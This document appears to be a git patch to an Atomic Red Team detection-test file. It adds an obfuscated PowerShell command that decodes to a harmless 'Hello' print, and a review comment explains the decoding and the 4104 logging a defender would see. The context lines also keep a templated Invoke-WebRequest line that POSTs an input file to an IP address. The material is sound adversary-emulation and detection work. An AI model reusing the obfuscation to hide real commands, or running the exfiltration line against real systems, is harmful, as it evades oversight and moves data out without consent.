From 189ae94750db61ac22eb759d3ecf4bb1b619f56a Mon Sep 17 00:00:00 2001
From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com>
Date: Mon, 26 Jul 2021 12:46:41 -0700
Subject: [PATCH] Update T1027.yaml

Added additional obfuscated PowerShell example.
---
 atomics/T1027/T1027.yaml | 12 ++++++++++++
 1 file changed, 12 insertions(+)

diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml
index 7210e5af..4d5a5c58 100644
--- a/atomics/T1027/T1027.yaml
+++ b/atomics/T1027/T1027.yaml
@@ -150,3 +150,15 @@ atomic_tests:
 command: |
 Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
 name: powershell
+
+- name: Obfuscated Command in PowerShell
+ auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f
+ description: |
+ This is an obfuscated PowerShell command which when executed prints "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ $cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING') ; $pz2Sb0 =[TYpE]("{1}{0}{2}"-f'nv','cO','ert') ; &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') ( (&("{1}{2}{0}"-f'blE','gET-','vaRIA') ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )
+ name: powershell
+
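Review bot: The new test's `description: |` block should say how the command is obfuscated and what telemetry a defender should expect, since the test exists to exercise T1027 detection rather than to print a greeting; as added it only names the source report. The octal values fed to `[Convert]::ToInt16(..., 8)` decode to `Write-Host 'Hello, from PowerShell!'`, which is then executed via `Invoke-Expression` (itself assembled with `-f` formatting from `'In','SiO','vOKe-EXp','ReS','n'`), so with script block logging enabled Event ID 4104 will typically record both the obfuscated block and a second, deobfuscated `Write-Host` block. I would append to the description: `The command is built from octal character codes via [Convert]::ToInt16(x, 8), joined with [String]::Join, and run through Invoke-Expression; expect a 4104 script block log for the obfuscated text and a second one for the decoded Write-Host command.` and add a link to the cited Red Canary report so the example can be traced. If the other tests in this file declare `elevation_required`, the new test should carry `elevation_required: false` for consistency; only the tail of the preceding test is visible in this hunk, so that cannot be confirmed here.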